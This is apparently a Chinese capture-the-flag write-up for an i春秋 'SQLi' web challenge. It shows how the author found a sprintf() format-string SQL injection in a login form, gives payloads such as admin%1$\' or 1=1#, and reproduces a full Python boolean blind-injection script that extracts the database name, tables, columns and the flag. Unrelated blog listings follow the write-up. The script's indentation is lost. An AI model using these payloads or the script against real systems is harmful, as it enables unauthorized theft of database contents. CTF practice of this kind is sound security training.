打开题目网页是个很简单的登录网页

先查看源码,抓包

都没找到可用的信息

依我所见这里应该就是一个注入

但是怎么输入都会回显username错误

直到输入admin

尝试admin#

Admin’#   username错误。。。

尝试万能密码。。。。。失败

先用bp去测试过滤的符号发现%会出现不一样的情况(刚学会的方法)

(测试方法

  1. 抓包
  2. 传intruder
  3. Positions中clear其他变量给admin(需要测量的地方)后面加上一个字符
  4. Payloads中add需要测试的字符串或则符号
  5. start attack

    统计不一样的长度回显)

    回到网页中进行测试发现当username中存在%的时候会出现warning报错

    可能注入点就在这里了

    猜测就是sprintf()的漏洞

    关于sprintf()菜鸟教程给出如下解释

    这里附上一篇sprintf()漏洞利用的博客:https://blog.csdn.net/WQ_BCJ/article/details/85057447

    Payload:

    admin%1$\’ or 1=1#

    admin%1$\’ or 1=2#

    发现第一个会爆出密码错误第二个爆出用户名错误

    总结出or后面的内容如果错误则报出密码错误,如果正确就用户名错误

    所以这里就使用盲注

    这里附上一个dalao的脚本

    #coding:utf-8

import requests
    
import string

def boom():
    
url = r'http://083f8085e75f4ea099423ca97e616c729b921691cfe34e7c.changame.ichunqiu.com/index.php'
    
s = requests.session()
    
dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
    
right = 'password error!'
    
error = 'username error!'

lens = 0
    
i = 0
    
while True:
    
payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"
    
data={'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if error in r:
    
lens=i
    
break
    
i+=1
    
pass
    
print("[+]length(database()): %d" %(lens))

strs=''
    
for i in range(lens+1):
    
for c in dic:
    
payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if right in r:
    
strs = strs + c
    
print strs
    
break
    
pass
    
pass
    
print("[+]database():%s" %(strs))

lens=0
    
i = 1
    
while True:
    
payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if error in r:
    
lens = i
    
break
    
i+=1
    
pass
    
print("[+]length(table): %d" %(lens))

strs=''
    
for i in range(lens+1):
    
for c in dic:
    
payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if right in r:
    
strs = strs + c
    
print strs
    
break
    
pass
    
pass
    
print("[+]table_name:%s" %(strs))
    
tablename = '0x' + strs.encode('hex')
    
table_name = strs

lens=0
    
i = 0
    
while True:
    
payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if error in r:
    
lens = i
    
break
    
i+=1
    
pass
    
print("[+]length(column): %d" %(lens))

strs=''
    
for i in range(lens+1):
    
for c in dic:
    
payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if right in r:
    
strs = strs + c
    
print strs
    
break
    
pass
    
pass
    
print("[+]column_name:%s" %(strs))
    
column_name = strs

num=0
    
i = 0
    
while True:
    
payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if error in r:
    
num = i
    
break
    
i+=1
    
pass
    
print("[+]number(column): %d" %(num))

lens=0
    
i = 0
    
while True:
    
payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
    
data = {'username':payload,'password':1}
    
r = s.post(url,data=data).content
    
if error in r:
    
lens = i
    
break
    
i+=1
    
pass
    
print("[+]length(value): %d" %(lens))

i=1
    
strs=''
    
for i in range(lens+1):
    
for c in dic:
    
payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
    
data = {'username':payload,'password':'1'}
    
r = s.post(url,data=data).content
    
if right in r:
    
strs = strs + c
    
print strs
    
break
    
pass
    
pass
    
print("[+]flag:%s" %(strs))

if __name__ == '__main__':
    
boom()
    
print 'Finish!'

      

    (源码地址:https://www.ichunqiu.com/writeup/detail/157)

    直接用盲注就爆出了flag

i春秋SQLi的更多相关文章

  1. 春秋-SQLi题

    这道题挺好的 学到的知识 sprintf()构成的sql注入漏洞 题目环境今天做的时候坏了 留下这几篇博客学习 https://blog.csdn.net/nzjdsds/article/detail ...

  2. 第二届i春秋挖洞大赛的一些感想

    挖洞比赛嘛,根据规则就是一个问题,如何在短时间内挖到更多.等级更高的漏洞? 先分析这个问题,需求是什么? 更多? 等级更高? 短时间内? 首先要解决的是时间的问题 时间有限,所以你必须要快.如何快?把 ...

  3. “百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧

    今天在i春秋做题的时候遇到了一道非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧. 题目i春秋连接:https://www.ichunqiu.com/battalion ...

  4. sqli篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较 ...

  5. i春秋url地址编码问题

    i春秋学院是国内比较知名的安全培训平台,前段时间看了下网站,顺便手工简单测试常见的XSS,发现网站搜索功能比较有意思. 其实是对用户输入的内容HTML编码和URL编码的处理方式在这里不合理,提交到乌云 ...

  6. 爱春秋之戏说春秋 Writeup

    爱春秋之戏说春秋 Writeup 第一关 图穷匕见 这一关关键是给了一个图片,将图片下载到本地后,打开以及查看属性均无任何发现,尝试把图片转换为.txt格式.在文本的最后发现这样一串有规律的代码: 形 ...

  7. i春秋——春秋争霸write up

    i春秋--春秋争霸write up 第一关 题目给出一张图 提示中,这种排列源于古老的奇书,暗含了两个数字,可以得出第一关的答案是两个数字 百度识图来一发, 得到图中排列是来自于洛书,点开洛书的百度百 ...

  8. SQLi filter evasion cheat sheet (MySQL)

    This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 y ...

  9. i春秋与我

    在i春秋论坛混迹了大半年了,在i春秋的在线平台学到了很多奇技淫巧,特别喜欢这个平台的气氛,以及虚拟在线网络环境的搭建, 忙周偷乐,过来也为i春秋做点小奉献,共同构造我们喜欢的春秋平台,成长特别快,特别 ...

  10. I春秋——Misc(贝斯家族)

    不好意思呀!最近一直忙着学习python,竟然忘记更新I春秋里面的题目了(QAQ),我以后会时时刻刻提醒自己要更新 永远爱你们的! ----新宝宝 1:贝斯家族: 解题思路:我相信看见这一题都能够想到 ...

随机推荐

  1. 【读书笔记】C#高级编程 第二十五章 事务处理

    (一)简介 事务的主要特征是,任务要么全部完成,要么都不完成. (二)概述 事务由事务管理器来管理和协调.每个影响事务结果的资源都由一个资源管理器来管理.事务管理器与资源管理器通信,以定义事务的结果. ...

  2. Java 多线程:线程池

    Java 多线程:线程池 作者:Grey 原文地址: 博客园:Java 多线程:线程池 CSDN:Java 多线程:线程池 工作原理 线程池内部是通过队列结合线程实现的,当我们利用线程池执行任务时: ...

  3. .NET 7 RC1 正式发布

    从年初2 月份发布第一个预览版,经历7个预览版后,Microsoft 西雅图时间9月14日发布了 .NET 7 RC 1:https://devblogs.microsoft.com/dotnet/a ...

  4. [Python]-os模块-文件读取

    import os 在Python中,os模块用来处理文件路径,比较方便. os读取文件 在读取文件过程中,最常用的几个功能如下: os.listdir() 获取此目录下的所有目录名,并且存为列表.在 ...

  5. Windows优先使用IPv4

    当前主流的Windows系统(从Windows 7之后)都会同时使用ipv6和ipv4,并且优先使用ipv6.当你ping另一个服务器的时候就能看到,优先使用的是ipv6进行通信.由于能够在DNS中解 ...

  6. 2021年3月-第02阶段-前端基础-Flex 伸缩布局-移动WEB开发_流式布局

    移动web开发流式布局 1.0 移动端基础 1.1 浏览器现状 PC端常见浏览器:360浏览器.谷歌浏览器.火狐浏览器.QQ浏览器.百度浏览器.搜狗浏览器.IE浏览器. 移动端常见浏览器:UC浏览器, ...

  7. ProxySQL 读写分离方法

    转载自:https://www.jianshu.com/p/597b840bf70c (使用正则表达式实现基本的读/写分离) 在这一部分,我将通过一个示例来演示如何通过正则表达式来实现读/写分离. 首 ...

  8. 在k8s集群中安装rook-ceph 1.8版本步骤

    官方文档地址:https://rook.io/docs/rook/v1.8/quickstart.html Kubernetes 最小版本号 Kubernetes 最小版本号:Kubernetes v ...

  9. kvm安装windows使用virtio驱动

    Windows安装VirtIO驱动的两种方法 已经使用IDE方式来安装好系统 (1)安装完Windows后,创建一块临时的硬盘和网卡,将其驱动都设置为virtio模式添加到Windows中 (2) 添 ...

  10. CentOS 7.9 安装 rabbitmq-3.10.2

    一.CentOS 7.9 安装 rabbitmq-3.10.2.tar.gz 地址 https://www.rabbitmq.com https://github.com/rabbitmq/rabbi ...